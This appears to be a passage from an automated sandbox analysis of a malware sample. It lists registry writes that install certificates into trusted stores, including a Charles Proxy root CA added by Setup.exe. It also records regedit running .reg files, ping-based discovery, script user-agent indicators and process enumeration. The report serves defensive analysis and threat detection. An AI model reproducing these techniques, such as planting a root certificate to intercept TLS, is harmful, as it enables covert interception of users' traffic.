Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f	vpn.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	file.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC	vpn.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be	vpn.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be	tapinstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	Setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f	tapinstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	Setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	tapinstall.exe

Runs .reg file with regedit 2 IoCs

pid	Process
5408	regedit.exe
6120	regedit.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery

T1018

pid	Process
1956	PING.EXE
2000	PING.EXE
1908	PING.EXE
2836	PING.EXE

Script User-Agent 15 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	118	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	143	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	200	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	394	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	5424	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	116	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	5443	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	13050	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	147	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	151	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	199	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	12418	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	115	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	374	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	7550	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1524	file.exe
1524	file.exe
3920	7502.tmp.exe
